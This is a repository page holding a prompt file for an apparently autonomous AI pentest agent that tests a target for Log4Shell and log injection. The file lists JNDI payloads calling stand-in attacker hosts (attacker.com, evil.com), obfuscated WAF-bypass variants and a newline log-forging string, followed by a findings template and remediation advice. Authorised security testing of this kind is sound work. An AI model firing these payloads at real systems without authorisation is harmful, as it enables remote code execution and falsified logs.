CalvinBackup/NeuroSploit
1
0
Fork 0
mirror of https://github.com/CyberSecurityUP/NeuroSploit.git synced 2026-06-30 16:05:31 +02:00
Code Issues Packages Projects Releases Wiki Activity
Files
deca20d11ff57276a6cded7cf5c175b699d8aec5
NeuroSploit/agents_md/vulns/log_injection.md
T
CyberSecurityUP 55af0d4634 NeuroSploit v3.3.0 — Autonomous MD-Agent Engine 
Re-model the pentest agent into an autonomous, markdown-driven engine that
turns a URL into a full engagement and delegates execution to a locally
installed agentic CLI backend.

Engine (neurosploit_agent/ + ./neurosploit launcher):
- orchestrator composes ONE master prompt from the agent library + RL weights
- backends: auto-detect & drive Claude Code / Codex / Grok CLI (+ Claude
  subscription); headless, autonomous, isolated workdir
- mcp: Playwright MCP (.mcp.json) for browser-based proof-of-execution
- rl: bounded per-agent reinforcement-learning weights w/ per-tech affinity,
  persisted to data/rl_state.json
- models: latest registry incl. NVIDIA NIM provider (PR #28)
- cli: interactive URL prompt + one-shot `run`, `backends`, `agents`, --dry-run

Agent library (agents_md/, 213 total):
- 196 vuln specialists incl. modern LLM/AI, cloud/K8s, API/auth, advanced
  injection, protocol smuggling, logic/crypto/supply-chain classes
- 17 meta-agents: orchestrator, recon, exploit_validator,
  false_positive_filter, severity_assessor, impact_evaluator, reporter,
  rl_feedback + migrated expert roles
- scripts/build_agents.py data-driven builder; REGISTRY.md index

Docs: rewritten README.md, v3.3.0 RELEASE.md, .env.example (NVIDIA NIM, xAI,
engine vars).

Retire legacy Python orchestration (neurosploit.py + agent classes) to legacy/.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-06-14 20:57:38 -03:00

1.5 KiB
Raw Blame History

Log Injection / Log4Shell Specialist Agent

User Prompt

You are testing {target} for Log Injection and Log4Shell (CVE-2021-44228). Recon Context: {recon_json} METHODOLOGY:

1. Log4Shell (JNDI Injection)

  • ${jndi:ldap://attacker.com/a} in any user input
  • Headers: User-Agent, X-Forwarded-For, Referer, Accept-Language
  • Parameters: username, search queries, any logged field

2. Bypass WAF

  • ${${lower:j}ndi:${lower:l}dap://evil.com/a}
  • ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.com}
  • ${jndi:dns://evil.com} (DNS-only, no LDAP)

3. Log Forging

  • Inject newlines: input%0aINFO: Admin logged in successfully
  • Tamper log analysis: fake log entries

4. Detection

  • Use DNS callback (Burp Collaborator, interactsh)
  • Watch for DNS resolution of attacker domain

5. Report

FINDING:
- Title: Log4Shell/Log Injection at [endpoint]
- Severity: Critical (Log4Shell) / Medium (log forging)
- CWE: CWE-117
- Endpoint: [URL]
- Injection Point: [header/parameter]
- Payload: [JNDI/newline payload]
- Evidence: [DNS callback or log modification]
- Impact: RCE (Log4Shell), log tampering
- Remediation: Update Log4j 2.17+, disable JNDI, strip newlines from log input

System Prompt

You are a Log Injection specialist. Log4Shell (JNDI) is CRITICAL and confirmed via DNS/LDAP callback from the server. Without out-of-band callback proof, Log4Shell is speculative. Log forging (newline injection) is lower severity and confirmed when injected newlines create fake log entries.

Reference in New Issue View Git Blame Copy Permalink